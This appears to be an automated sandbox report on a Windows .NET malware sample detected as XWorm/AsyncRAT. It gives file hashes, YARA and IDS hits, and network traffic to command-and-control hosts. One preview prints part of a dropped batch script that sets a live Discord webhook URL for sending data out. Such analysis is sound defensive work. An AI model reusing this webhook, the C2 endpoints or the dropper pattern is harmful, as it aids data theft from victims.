                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Users\user\adawsfaefasfasfg.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 6 20:46:47 2024, mtime=Fri Dec 6 20:46:47 2024, atime=Fri Dec 6 20:46:47 2024, length=43520, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):761
                                                                                                              Entropy (8bit):5.017691496783147
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:89Ncg4oRS70tChveedY//uaDLwcDI4H6jAsaqwNHcllCfHICiveymV:8MdMbZXtUqGAsaqwjfILpm
                                                                                                              MD5:30557632F1E5F405E049B9BF7D81649A
                                                                                                              SHA1:9691C64775A3CBAEEE757C95C42CA07DB32D0ED5
                                                                                                              SHA-256:8CE5BC03E67F2522566168E6DA8FA84C0BE8FAA7C133627676D06733702E2127
                                                                                                              SHA-512:248A8A1BBA99062BACEA2BE988D3BC1DAF4F2917BB7873FB258AC8EA49DF1704102688023B707DEC73531BAEC71330F62C1C39E65B34A061CDCE4FA73BEBE3D7
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.... .....Y(H....Y(H....Y(H..........................t.:..DG..Yr?.D..U..k0.&...&.......bBDj...dEu.(H.....Y(H......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y............................=...A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EWsG.Y................................R.o.a.m.i.n.g.....`.2......Y. .SYSTEN~1..H......Y..Y.....((.....................?..S.y.s.t.e.n. .U.s.e.r.......X...............-.......W..................C:\Users\user\AppData\Roaming\Systen User........\.....\.....\.....\.....\.S.y.s.t.e.n. .U.s.e.r.`.......X.......364339...........hT..CrF.f4... .........,...E...hT..CrF.f4... .........,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                              Process:C:\Users\user\adawsfaefasfasfg.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):43520
                                                                                                              Entropy (8bit):5.573723719197455
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:S/ecdw4rtLx9rOu3Wm46F5PG9cNZ66vOwhc3Emjy:S/ecd5BdJWuFI9cZ66vOwy9W
                                                                                                              MD5:190010C187189B92E49A0ED05F6DDC88
                                                                                                              SHA1:9B144541973B7DB5B12BEC70EDAEF58A8769C4B3
                                                                                                              SHA-256:C0F48BF2F29B0BC6A2D83316327B101FABF9B1D2341749D2264EDCA7BBC0DD46
                                                                                                              SHA-512:6FE1E3A6896BD4C89705A5F96613E53319A1845517708D22230CB55C5184831A82D0D17DFD24106DBED79860412E22403268DEEF488B8174CA49EAF1E04D9334
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Systen User, Author: ditekSHen
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O"Sg............................~.... ........@.. ....................................@.................................$...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H.......La...]............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                              Process:C:\Users\user\Desktop\ozgpPwVAu1.exe
                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):7305
                                                                                                              Entropy (8bit):5.313456752501657
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:qDxqudX5OMo+1PY5+2f0tf8w12f02OI12f0uw12f0j:ArX5OMo+doJQ8wAdOIA7wAG
                                                                                                              MD5:8D9DF9F485F51AC617832650A0D075AC
                                                                                                              SHA1:151B2C621AF3D6DEEF6EF93BEA703221D7C21632
                                                                                                              SHA-256:6ED99CC4AFD8F9309D4DBAC2E440E7AA1622A35C520BD74C65D4B5BA12DD75B4
                                                                                                              SHA-512:D0FB568F1A0A5ACC8728A44E364297326E6C0E0CDF35D70CF42CFBED529511A4CE7ED583562A4532CCA4B4EB2941EFE94C987135E292CCA277BC5F02B3A5A324
                                                                                                              Malicious:true
                                                                                                              Preview:::[Bat To Exe Converter]..::..::YAwzoRdxOk+EWAnk..::fBw5plQjdG8=..::YAwzuBVtJxjWCl3EqQJgSA==..::ZR4luwNxJguZRRnk..::Yhs/ulQjdF+5..::cxAkpRVqdFKZSDk=..::cBs/ulQjdF+5..::ZR41oxFsdFKZSDk=..::eBoioBt6dFKZSDk=..::cRo6pxp7LAbNWATEpCI=..::egkzugNsPRvcWATEpCI=..::dAsiuh18IRvcCxnZtBJQ..::cRYluBh/LU+EWAnk..::YxY4rhs+aU+JeA==..::cxY6rQJ7JhzQF1fEqQJQ..::ZQ05rAF9IBncCkqN+0xwdVs0..::ZQ05rAF9IAHYFVzEqQJQ..::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=..::fBEirQZwNQPfEVWB+kM9LVsJDGQ=..::cRolqwZ3JBvQF1fEqQJQ..::dhA7uBVwLU+EWDk=..::YQ03rBFzNR3SWATElA==..::dhAmsQZ3MwfNWATElA==..::ZQ0/vhVqMQ3MEVWAtB9wSA==..::Zg8zqx1/OA3MEVWAtB9wSA==..::dhA7pRFwIByZRRnk..::Zh4grVQjdCyDJGyX8VAjFBhbSA2MAE+1EbsQ5+n//NaVrU8RW/pxfZfeug==..::YB416Ek+ZG8=..::..::..::978f952a14a936cc963da21a135fa983..@echo off..title Nexus Tools..color F..chcp 65001....setlocal enabledelayedexpansion....:: Define the webhook URL here..set "WEBHOOK_URL=https://discordapp.com/api/webhooks/1309170780696870912/8yNfzeRdjxyYLYxaut1-j0gdfkndb6ZneH0LI8EP6wjxbAcxt3Le1IqSe
                                                                                                              Process:C:\Users\user\Desktop\ozgpPwVAu1.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):43520
                                                                                                              Entropy (8bit):5.573723719197455
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:S/ecdw4rtLx9rOu3Wm46F5PG9cNZ66vOwhc3Emjy:S/ecd5BdJWuFI9cZ66vOwy9W
                                                                                                              MD5:190010C187189B92E49A0ED05F6DDC88
                                                                                                              SHA1:9B144541973B7DB5B12BEC70EDAEF58A8769C4B3
                                                                                                              SHA-256:C0F48BF2F29B0BC6A2D83316327B101FABF9B1D2341749D2264EDCA7BBC0DD46
                                                                                                              SHA-512:6FE1E3A6896BD4C89705A5F96613E53319A1845517708D22230CB55C5184831A82D0D17DFD24106DBED79860412E22403268DEEF488B8174CA49EAF1E04D9334
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: ditekSHen
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O"Sg............................~.... ........@.. ....................................@.................................$...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H.......La...]............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                              Process:C:\Users\user\Desktop\ozgpPwVAu1.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41472
                                                                                                              Entropy (8bit):5.550217090046014
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:pnR3k+5jVuXBRiniBuuAMz+9vCF5Pr9jCgQ67OMhl3ID0L:pR3k9RRin/yFF9G367OMnYw
                                                                                                              MD5:34452F83F7D58EC91D2CEDF4B24C9764
                                                                                                              SHA1:3255103025C5F55B0AE23EC0F7CC6B1CE7A88A3C
                                                                                                              SHA-256:D1D2C305066627967017D7F513550DD64E2F4675A14412D8C6017957F52D4DEA
                                                                                                              SHA-512:F21179EA716618C94E76DAC7BD08E420A330EF4F8FDA8D51EE2BE06D4E6B524596221E8F96297BCA3696BBA07167295F7D2BD1D65A1C39A5C3FAADC5B58D8148
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\wasdwasfwasfs.exe, Author: ditekSHen
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."Sg................................. ........@.. ....................................@....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......<\...Y............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                              Process:C:\Windows\System32\where.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):30
                                                                                                              Entropy (8bit):4.5232314287976205
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:oXeNy:oXeNy
                                                                                                              MD5:B6E4FC39D5CB35C4C14CDCD7E65A7818
                                                                                                              SHA1:94C0DA5BF10382AA19C84A3A6E9A2DEEBA809196
                                                                                                              SHA-256:3B33F5B322B2D9449E8B63A1C6220EFD1F0D12E9A476007FABB15A5FEAA18799
                                                                                                              SHA-512:4A3C061D3D504CB34D5CFED681DB2B5D295206AE64FB287DA47DCA0B1F50C1028627F692F002BB051F1987260CC5CBB7CB25CD0339ED09FF36E0CFE8315DE646
                                                                                                              Malicious:false
                                                                                                              Preview:C:\Windows\System32\curl.exe..
                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.934328678955829
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              File name:ozgpPwVAu1.exe
                                                                                                              File size:193'024 bytes
                                                                                                              MD5:784bd7f714cf13880f47c591e7aed7fa
                                                                                                              SHA1:66c44c447a49221b5e61e9552012db6420f561e9
                                                                                                              SHA256:622b720c1733ce7dfd2e1d5f11f9c0c8bd93f11fcae3341a5db5b8a03cca7968
                                                                                                              SHA512:4122a72f472c0fa80cf4ecbba662e2b4d3b08fcfd10d9ac74187b8319804cf7f007a2f68a3990be2d679f1d77e6619212b0f2658aa8d703b3601ea8617033c01
                                                                                                              SSDEEP:3072:BkBU+HnNucPkNf0TOX7aeCBm9Fi6AbC6pqS631IuCs09GC4i520zvZgJPxli5U:kHNJPifUU+ezFnALp+38sAGPi5PzRgJ2
                                                                                                              TLSH:A014F12489E74D7AE7E75AF67E92F670A930CFD2204F420EB488F98CA457B4C54E051B
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q"Sg.....................Z........... ........@.. .......................@............@................................
                                                                                                              Icon Hash:86b1697be9c9ccd8
                                                                                                              Entrypoint:0x41b4ee
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x67532271 [Fri Dec 6 16:12:33 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1b4940x57.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x1574a.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000x194f40x19600ad97917883ae58cd179aabbe1ad0b33dFalse0.9281769550492611data7.927667118084018IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x1c0000x1574a0x15800c9f48a42bdd4398b9093fecfb95d1b21False0.9910519622093024data7.955976303596955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x320000xc0x200ffbee573c3e2b9a1971cde3aa1d5809bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0x1c1300x151a5PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced1.0004164883094044
                                                                                                              RT_GROUP_ICON0x312d80x14Targa image data - Map 65536 x 20901 x 10.9
                                                                                                              RT_VERSION0x312ec0x274data0.4601910828025478
                                                                                                              RT_MANIFEST0x315600x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-06T22:45:53.124203+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.949825149.154.167.220443TCP
                                                                                                              2024-12-06T22:46:18.119385+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.949853147.185.221.2212886TCP
                                                                                                              2024-12-06T22:46:18.826308+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:46:18.858988+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949853147.185.221.2212886TCP
                                                                                                              2024-12-06T22:46:19.602049+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:46:19.602049+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:46:30.092229+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:46:30.094220+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949853147.185.221.2212886TCP
                                                                                                              2024-12-06T22:46:41.372777+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:46:41.375960+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949853147.185.221.2212886TCP
                                                                                                              2024-12-06T22:46:49.604166+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:46:49.604166+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:46:51.511796+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.949958149.154.167.220443TCP
                                                                                                              2024-12-06T22:46:52.653608+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:46:52.655477+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949853147.185.221.2212886TCP
                                                                                                              2024-12-06T22:47:01.107348+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:47:01.117066+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949853147.185.221.2212886TCP
                                                                                                              2024-12-06T22:47:02.686350+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              2024-12-06T22:47:13.200721+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.949977147.185.221.2212886TCP
                                                                                                              2024-12-06T22:47:13.928949+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949977TCP
                                                                                                              2024-12-06T22:47:13.968839+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949977147.185.221.2212886TCP
                                                                                                              2024-12-06T22:47:15.277941+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.949853147.185.221.2212886TCP
                                                                                                              2024-12-06T22:47:16.427395+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2212886192.168.2.949853TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 6, 2024 22:45:01.722167015 CET4971780192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:45:01.726370096 CET4971880192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:45:01.841959000 CET8049717208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:45:01.842058897 CET4971780192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:45:01.846131086 CET8049718208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:45:01.846230984 CET4971880192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:45:01.881999969 CET4971780192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:45:01.883156061 CET4971880192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:45:02.001864910 CET8049717208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:45:02.002975941 CET8049718208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:45:02.967194080 CET8049718208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:45:03.009694099 CET4971880192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:45:03.016623020 CET8049717208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:45:03.071940899 CET4971780192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:45:51.024827003 CET49825443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:45:51.024863958 CET44349825149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:45:51.025024891 CET49825443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:45:51.044156075 CET49825443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:45:51.044178963 CET44349825149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:45:52.441112995 CET44349825149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:45:52.441196918 CET49825443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:45:52.442986965 CET49825443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:45:52.442994118 CET44349825149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:45:52.443258047 CET44349825149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:45:52.487377882 CET49825443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:45:52.535340071 CET44349825149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:45:53.124233961 CET44349825149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:45:53.124317884 CET44349825149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:45:53.125008106 CET49825443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:45:53.130191088 CET49825443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:03.388433933 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:03.508286953 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:03.508466959 CET4985312886192.168.2.9147.185.221.22
